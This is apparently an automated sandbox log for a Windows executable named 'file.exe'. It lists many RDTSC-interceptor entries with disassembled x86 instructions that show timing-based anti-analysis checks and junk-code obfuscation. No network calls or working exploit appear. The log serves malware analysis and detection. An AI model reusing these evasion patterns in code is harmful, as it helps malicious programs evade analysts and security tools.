Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121599F second address: 12159B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F04D4C79EADh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1216756 second address: 1216760 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1216760 second address: 1216782 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F04D4C79EB8h 0x00000008 jmp 00007F04D4C79EB2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1216782 second address: 1216787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121767B second address: 12176B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F04D4C79EA8h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 nop 0x00000013 cld 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+1245CF6Bh], ecx 0x0000001c push 00000000h 0x0000001e or di, DD00h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jnl 00007F04D4C79EA8h 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1218563 second address: 1218568 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1219554 second address: 1219558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1218804 second address: 1218829 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F04D4C82A46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1218829 second address: 121882D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A613 second address: 121A617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A617 second address: 121A61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A61D second address: 121A627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F04D4C82A46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A627 second address: 121A62B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121B64B second address: 121B655 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04D4C82A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121C5AA second address: 121C5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121B857 second address: 121B871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jc 00007F04D4C82A4Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121C5AE second address: 121C5B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121C7F7 second address: 121C81C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F04D4C82A46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12234BD second address: 12234C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12234C1 second address: 12234DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F04D4C82A51h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12234DC second address: 12234E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12234E0 second address: 12234EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12234EF second address: 12234F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12234F3 second address: 12234FF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F04D4C82A46h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12234FF second address: 1223505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1223505 second address: 1223521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A58h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1223521 second address: 1223531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F04D4C79EA6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12240CF second address: 12240D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 122DDA1 second address: 122DDB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F04D4C79EA6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 122FF7A second address: 122FF7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 122FF7E second address: 122FFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F04D4C79EACh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f jmp 00007F04D4C79EABh 0x00000014 pop eax 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F04D4C79EB5h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 122FFBA second address: 122FFBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1230258 second address: 1230274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1230274 second address: 12302BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F04D4C82A55h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 jmp 00007F04D4C82A58h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12302BA second address: 1041A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 jno 00007F04D4C79EAEh 0x0000000e push dword ptr [ebp+122D11D9h] 0x00000014 pushad 0x00000015 mov ecx, 3A2A0D64h 0x0000001a mov bx, BC7Fh 0x0000001e popad 0x0000001f call dword ptr [ebp+122D27AFh] 0x00000025 pushad 0x00000026 jo 00007F04D4C79EACh 0x0000002c mov dword ptr [ebp+122D17D9h], edx 0x00000032 xor eax, eax 0x00000034 mov dword ptr [ebp+122D17D9h], edi 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e cld 0x0000003f jmp 00007F04D4C79EB5h 0x00000044 mov dword ptr [ebp+122D385Bh], eax 0x0000004a stc 0x0000004b mov esi, 0000003Ch 0x00000050 pushad 0x00000051 mov ax, 116Bh 0x00000055 popad 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a cld 0x0000005b lodsw 0x0000005d jmp 00007F04D4C79EAAh 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 jnl 00007F04D4C79EACh 0x0000006c mov ebx, dword ptr [esp+24h] 0x00000070 mov dword ptr [ebp+122D17D9h], ebx 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 jmp 00007F04D4C79EB1h 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12343CE second address: 12343D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12343D2 second address: 1234406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F04D4C79EACh 0x0000000c jmp 00007F04D4C79EADh 0x00000011 popad 0x00000012 pop edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F04D4C79EAFh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1234406 second address: 123440F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1234B8A second address: 1234B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d jnp 00007F04D4C79EACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1234B9F second address: 1234BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1234BA3 second address: 1234BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F04D4C79EA6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1235158 second address: 1235166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F04D4C82A46h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1235166 second address: 1235172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F04D4C79EA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1235172 second address: 1235179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1235179 second address: 123517E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123517E second address: 1235184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1239DA6 second address: 1239DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1239DB2 second address: 1239DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FF1A4 second address: 11FF1A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FF1A8 second address: 11FF244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jno 00007F04D4C82A46h 0x00000014 jnp 00007F04D4C82A46h 0x0000001a popad 0x0000001b jmp 00007F04D4C82A54h 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F04D4C82A48h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c lea eax, dword ptr [ebp+12490EE3h] 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007F04D4C82A48h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c xor dword ptr [ebp+122D1B38h], edx 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F04D4C82A52h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FF244 second address: 11FF24A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FF24A second address: 11FF24E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FF24E second address: 11E5347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push esi 0x0000000b jns 00007F04D4C79EA6h 0x00000011 pop esi 0x00000012 pop esi 0x00000013 nop 0x00000014 jnp 00007F04D4C79EACh 0x0000001a mov ecx, dword ptr [ebp+122D3717h] 0x00000020 call dword ptr [ebp+1245FF67h] 0x00000026 jp 00007F04D4C79ECBh 0x0000002c pushad 0x0000002d jmp 00007F04D4C79EB7h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FF6AE second address: 11FF6B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FF6B4 second address: 11FF6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F04D4C79EACh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FFA2F second address: 11FFA44 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F04D4C82A48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b mov ecx, eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FFB02 second address: 11FFB2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F04D4C79EAFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F04D4C79EADh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FFB2E second address: 11FFB32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FFB32 second address: 11FFB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1200107 second address: 1200179 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F04D4C82A4Bh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 add dword ptr [ebp+122D17CCh], ebx 0x00000019 push 0000001Eh 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F04D4C82A48h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov edx, dword ptr [ebp+122D3943h] 0x0000003b nop 0x0000003c pushad 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 jl 00007F04D4C82A46h 0x00000046 popad 0x00000047 jmp 00007F04D4C82A57h 0x0000004c popad 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 pushad 0x00000052 popad 0x00000053 pop eax 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12002E1 second address: 12002E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12002E5 second address: 12002EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11B987A second address: 11B9884 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F04D4C79EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1239660 second address: 123966B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1239957 second address: 123997B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F04D4C79EB8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123997B second address: 1239987 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F04D4C82A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1239987 second address: 1239995 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F04D4C79EA6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11C3976 second address: 11C3983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12408F7 second address: 124090A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04D4C79EADh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124090A second address: 124090E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1240BC9 second address: 1240BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007F04D4C79EAAh 0x0000000f pushad 0x00000010 jg 00007F04D4C79EA6h 0x00000016 jc 00007F04D4C79EA6h 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1240D12 second address: 1240D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1240D18 second address: 1240D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1240D1C second address: 1240D37 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F04D4C82A46h 0x00000015 ja 00007F04D4C82A46h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1240D37 second address: 1240D3F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1240D3F second address: 1240D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F04D4C82A46h 0x0000000a jo 00007F04D4C82A46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1240E82 second address: 1240E90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F04D4C79EAEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AF528 second address: 11AF561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F04D4C82A46h 0x0000000a pop edx 0x0000000b pushad 0x0000000c jmp 00007F04D4C82A55h 0x00000011 jmp 00007F04D4C82A55h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AF561 second address: 11AF566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AF566 second address: 11AF56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AF56C second address: 11AF5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB5h 0x00000009 popad 0x0000000a jg 00007F04D4C79EACh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AF5A2 second address: 11AF5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AF5A6 second address: 11AF5B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F04D4C79EADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AF5B9 second address: 11AF5C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AF5C3 second address: 11AF5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1249B81 second address: 1249B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
